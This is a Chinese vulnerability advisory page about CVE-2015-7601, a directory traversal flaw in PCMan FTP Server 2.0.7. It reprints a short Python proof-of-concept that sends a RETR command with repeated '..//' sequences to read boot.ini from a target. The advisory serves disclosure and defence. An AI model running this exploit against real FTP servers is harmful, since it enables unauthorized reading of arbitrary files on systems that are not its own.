首页 -> 安全研究

安全研究

安全漏洞
PCMan FTP Server信息泄露漏洞(CVE-2015-7601)

发布日期:2015-09-29
更新日期:2015-09-30

受影响系统:
PCMan PCMan FTP Server 2.0.7
描述:
CVE(CAN) ID: CVE-2015-7601

PCMan FTP Server是简单易于的基础FTP服务器。

PCMan FTP Server 2.0.7版本存在目录遍历漏洞,远程攻击者通过RETR命令内的"../ ",利用此漏洞可读取任意文件。

<*来源:Jay Turla
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Jay Turla ()提供了如下测试方法:

#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Directory Traversal
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# description: PCMAN FTP 2.07 is vulnerable to Directory Traversal (quick and dirty code just for PoC)

from ftplib import FTP

ftp = FTP(raw_input("Target IP: "))
ftp.login()                  
ftp.retrbinary('RETR ..//..//..//..//..//..//..//..//..//..//..//boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"

建议:
厂商补丁:

PCMan
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sourceforge.net/projects/pcmanftpd/

浏览次数:1899
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障